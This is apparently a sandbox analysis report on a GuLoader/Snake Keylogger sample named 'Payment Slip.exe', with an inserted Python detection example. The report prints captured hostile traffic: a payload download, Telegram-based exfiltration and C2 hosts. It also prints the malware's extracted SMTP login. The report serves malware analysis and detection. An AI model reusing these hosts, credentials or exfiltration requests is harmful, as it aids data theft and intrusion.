Windows Analysis Report
Payment Slip.exe

Overview

General Information

Sample name: Payment Slip.exe
Analysis ID: 1481491
MD5: db9b31da65d0ef913176d54ceb4cf5f4
SHA1: 5878f8c4e6b82ef6c9d32c020bb9d5898e973e96
SHA256: 893b893178434a4273089c619b1acaefab661c6d647d832a6375fb53e2753669
Tags: exe

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
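Two of the signatures above are Sigma hits ("Suspicious Script Execution From Temp Folder" and "Suspicious Outbound SMTP Connections"). The following is an added example, not part of the Joe Sandbox report and not Sigma's own rule text: it evaluates constructed Sysmon-style events (Event ID 1 process creation, Event ID 3 network connection) against conditions modelled on those two titles. Field names follow Sysmon; the event values, the script-host set and the mail-client allowlist are this example's assumptions. The paths and the SMTP destination are taken from the report (Masculinity.exe under AppData\Local\Temp, TCP to 66.29.159.53:587); the PowerShell command line is invented, since the report does not print it.

```python
"""Host-side checks modelled on the two Sigma titles in the signature list.

Added example (not from the report, not Sigma's rule text). Events are
constructed dicts using Sysmon field names; values are assumptions except
for the paths and the SMTP destination, which come from the report.
"""
import re

# Script hosts whose Temp-folder execution the first rule is concerned with (assumed set).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
# Processes allowed to speak SMTP outbound (assumed allowlist; tune per estate).
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
SMTP_PORTS = {25, 465, 587}
# Matches ...\Temp\ anywhere in a path, so both AppData\Local\Temp and Windows\Temp qualify.
TEMP_PATH = re.compile(r"\\Temp\\", re.IGNORECASE)

# Constructed events (not the report's real telemetry). The stage.ps1 name is invented.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\stage.ps1"',
     "ParentImage": r"C:\Users\user\Desktop\Payment Slip.exe"},
    {"EventID": 1, "Image": r"C:\Users\user\AppData\Local\Temp\Masculinity.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\Temp\Masculinity.exe"',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 3, "Image": r"C:\Users\user\AppData\Local\Temp\Masculinity.exe",
     "DestinationIp": "66.29.159.53", "DestinationPort": 587, "Protocol": "tcp"},
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "DestinationIp": "40.99.10.2", "DestinationPort": 587, "Protocol": "tcp"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Get-Process", "ParentImage": r"C:\Windows\explorer.exe"},
]


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def script_from_temp(event):
    """Process creation of a script host whose command line references a Temp path."""
    if event.get("EventID") != 1:
        return False
    return image_name(event["Image"]) in SCRIPT_HOSTS and bool(TEMP_PATH.search(event.get("CommandLine", "")))


def suspicious_smtp(event):
    """Outbound TCP to an SMTP port from anything that is not an allowlisted mail client."""
    if event.get("EventID") != 3 or event.get("Protocol", "tcp") != "tcp":
        return False
    return event["DestinationPort"] in SMTP_PORTS and image_name(event["Image"]) not in MAIL_CLIENTS


def evaluate(events=SAMPLE_EVENTS):
    """Return (rule title, offending image name) for every event that fires a rule."""
    hits = []
    for ev in events:
        if script_from_temp(ev):
            hits.append(("Suspicious Script Execution From Temp Folder", image_name(ev["Image"])))
        if suspicious_smtp(ev):
            hits.append(("Suspicious Outbound SMTP Connections", image_name(ev["Image"])))
    return hits


if __name__ == "__main__":
    for title, image in evaluate():
        print(f"{title}: {image}")
```

On the constructed events only the PowerShell launch that references a Temp path and the Masculinity.exe connection to port 587 fire; Outlook on 587 and a PowerShell command without a Temp path do not. Note that the Masculinity.exe process creation itself passes both rules, which is why the report relies on separate signatures ("Powershell drops PE file", "Drops PE files") for that step.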

Classification

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/stealers such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XOR-encrypted.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual data exfiltration methods, including email (SMTP), FTP, Pastebin and the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: http://smtp.privateemail.com Avira URL Cloud: Label: malware
Source: http://anotherarmy.dns.army:8081 Avira URL Cloud: Label: malware
Source: http://aborters.duckdns.org:8081 Avira URL Cloud: Label: malware
Source: 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "amir.brizman@raicoi.com", "Password": "9Lhb3)$OQ.km", "Host": "smtp.privateemail.com", "Port": "587"}
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe ReversingLabs: Detection: 31%
Source: Payment Slip.exe ReversingLabs: Detection: 31%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04A986DC CryptUnprotectData, 7_2_04A986DC
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04A98EF1 CryptUnprotectData, 7_2_04A98EF1
Source: Payment Slip.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.0
Source: unknown HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: Binary string: ation.pdb source: powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2678804410.00000000080E2000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Payment Slip.exe Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405770
Source: C:\Users\user\Desktop\Payment Slip.exe Code function: 0_2_0040622B FindFirstFileW,FindClose, 0_2_0040622B
Source: C:\Users\user\Desktop\Payment Slip.exe Code function: 0_2_0040276E FindFirstFileW, 0_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_0040276E FindFirstFileW, 7_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 7_2_00405770
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_0040622B FindFirstFileW,FindClose, 7_2_0040622B
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 0015F2EDh 7_2_0015F150
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 0015F2EDh 7_2_0015F33C
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 0015FAA9h 7_2_0015F804
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A631E8h 7_2_04A62DD0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A62C21h 7_2_04A62970
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A6FD21h 7_2_04A6FA78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A60D0Dh 7_2_04A60B30
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A61697h 7_2_04A60B30
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A6D1B1h 7_2_04A6CF08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A6E769h 7_2_04A6E4C0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A6DEB9h 7_2_04A6DC10
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A6E311h 7_2_04A6E068
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_04A60040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A631E8h 7_2_04A62DCB
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A6F471h 7_2_04A6F1C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A631E8h 7_2_04A63116
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A6EBC1h 7_2_04A6E918
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A6F019h 7_2_04A6ED70
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A6F8C9h 7_2_04A6F620
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A6DA61h 7_2_04A6D7B8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A6D609h 7_2_04A6D360
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A99280h 7_2_04A98FB0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A97EB5h 7_2_04A97B78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A92151h 7_2_04A91EA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9DF86h 7_2_04A9DCB8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A96733h 7_2_04A96488
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then mov esp, ebp 7_2_04A9AC81
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A90741h 7_2_04A90498
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9F1C6h 7_2_04A9EEF8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A90B99h 7_2_04A908F0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A97571h 7_2_04A972C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9BF96h 7_2_04A9BCC8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A95179h 7_2_04A94ED0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9DAF6h 7_2_04A9D828
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A948C9h 7_2_04A94620
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9BB06h 7_2_04A9B838
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A962D9h 7_2_04A96030
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A932B1h 7_2_04A93008
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9FAE6h 7_2_04A9F818
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A96CC1h 7_2_04A96A18
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9ED36h 7_2_04A9EA68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A93709h 7_2_04A93460
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A94D21h 7_2_04A94A78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9CD46h 7_2_04A9CA78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A97119h 7_2_04A96E70
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A902E9h 7_2_04A90040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A91CF9h 7_2_04A91A50
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9B676h 7_2_04A9B3A8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A91449h 7_2_04A911A0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A92E59h 7_2_04A92BB0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9F656h 7_2_04A9F388
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A95A29h 7_2_04A95780
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9D666h 7_2_04A9D398
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9C8B6h 7_2_04A9C5E8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A918A1h 7_2_04A915F8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A95E81h 7_2_04A95BD8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9E8A6h 7_2_04A9E5D8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A955D1h 7_2_04A95328
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A979C9h 7_2_04A97720
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9D1D6h 7_2_04A9CF08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A925A9h 7_2_04A92300
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9B1E6h 7_2_04A9AF18
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9E416h 7_2_04A9E148
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A90FF1h 7_2_04A90D48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A92A01h 7_2_04A92758
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04A9C426h 7_2_04A9C158
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB64E0h 7_2_04AB61E8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB5EB7h 7_2_04AB5B48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB3076h 7_2_04AB2DA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABD7A0h 7_2_04ABD4A8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABAC98h 7_2_04ABA9A0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB5986h 7_2_04AB56B8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB94B0h 7_2_04AB91B8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB69A8h 7_2_04AB66B0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB2756h 7_2_04AB2488
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABC480h 7_2_04ABC188
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB154Eh 7_2_04AB1280
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB9978h 7_2_04AB9680
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB5066h 7_2_04AB4D98
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB8190h 7_2_04AB7E98
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABEF88h 7_2_04ABEC90
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB42B6h 7_2_04AB3FE8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABFDE0h 7_2_04ABFAE8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABD2D8h 7_2_04ABCFE0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB22C6h 7_2_04AB1FF8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABBAF0h 7_2_04ABB7F8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB10BEh 7_2_04AB0DF0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB8FE8h 7_2_04AB8CF0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB3996h 7_2_04AB36C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABEAC0h 7_2_04ABE7C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABBFB8h 7_2_04ABBCC0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABA7D0h 7_2_04ABA4D8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB079Eh 7_2_04AB04D0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB7CC8h 7_2_04AB79D0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB54F6h 7_2_04AB5228
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB8B20h 7_2_04AB8828
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABF918h 7_2_04ABF620
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB3506h 7_2_04AB3238
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABE130h 7_2_04ABDE38
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABB628h 7_2_04ABB330
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB4BD6h 7_2_04AB4908
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB7800h 7_2_04AB7508
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABE5F8h 7_2_04ABE300
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB2BE6h 7_2_04AB2918
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABCE10h 7_2_04ABCB18
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB19B7h 7_2_04AB1710
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABA308h 7_2_04ABA010
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB1E36h 7_2_04AB1B68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABB160h 7_2_04ABAE68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB0C2Eh 7_2_04AB0960
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB8658h 7_2_04AB8360
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB4747h 7_2_04AB4478
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB6E70h 7_2_04AB6B78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABDC68h 7_2_04ABD970
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB9E40h 7_2_04AB9B48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB030Eh 7_2_04AB0040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB7338h 7_2_04AB7040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04AB3E26h 7_2_04AB3B58
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABF450h 7_2_04ABF158
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04ABC948h 7_2_04ABC650
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04E01B20h 7_2_04E01828
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04E01190h 7_2_04E00E98
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04E00339h 7_2_04E00040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04E00CC8h 7_2_04E009D0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04E01658h 7_2_04E01360
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then jmp 04E00800h 7_2_04E00508
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then push 00000000h 7_2_04E854CF
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 7_2_04E808DE
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 7_2_04E80960
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 7_2_04E80D26
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 7_2_04E80A10

Networking

Source: unknown DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.5:49734 -> 66.29.159.53:587
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3
Source: Joe Sandbox View IP Address: 193.122.6.168
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: global traffic TCP traffic: 192.168.2.5:49734 -> 66.29.159.53:587
Source: global traffic HTTP traffic detected: GET /wp-includes/MGGxuAN14.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.reap.skyestates.com.mt | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
